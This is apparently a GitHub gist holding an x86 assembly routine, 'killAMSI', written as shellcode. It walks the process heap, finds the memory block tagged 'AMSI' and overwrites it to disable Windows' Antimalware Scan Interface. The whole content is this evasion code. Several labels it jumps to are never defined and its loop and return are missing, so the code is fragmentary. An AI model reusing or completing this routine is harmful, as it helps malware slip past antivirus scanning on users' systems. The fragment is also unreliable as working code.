Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
killAMSI proc
push ebp
mov ebp, esp
; allocate space for our phe
sub esp, sizeof PROCESS_HEAP_ENTRY
push edx
push esi
; fetch first heap of process
lea edx, [ebx].ShellCodeEnvironment.heapHandle
push edx
push 1 ; only one heap handle please
call [ebx].ShellCodeEnvironment.getProcessHeapsAddress
; initialize lpData to zero for the first time
xor eax, eax
mov [esi], eax
; now iterate over the heap via HeapWalk
push esi
push [ebx].ShellCodeEnvironment.heapHandle
call [ebx].ShellCodeEnvironment.heapWalkAddress
or eax, eax
jz noAMSIFound
; fetch flags from PHE
mov al, byte ptr [esi].PROCESS_HEAP_ENTRY.wFlags
; check if this an allocated area
and al, 14h
jz doTheMoonWalk
; allocated block -> check data
mov edx, dword ptr [esi].PROCESS_HEAP_ENTRY.lpData
cmp dword ptr [edx], 049534d41h ; "AMSI"
jnz doTheMoonWalk
; we found the AMSI context --> destroy it
mov eax, 0deadbeefh
mov [edx], eax
pop esi
pop edx
; restore stack pointer
mov esp, ebp
pop ebp
killAMSI endp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.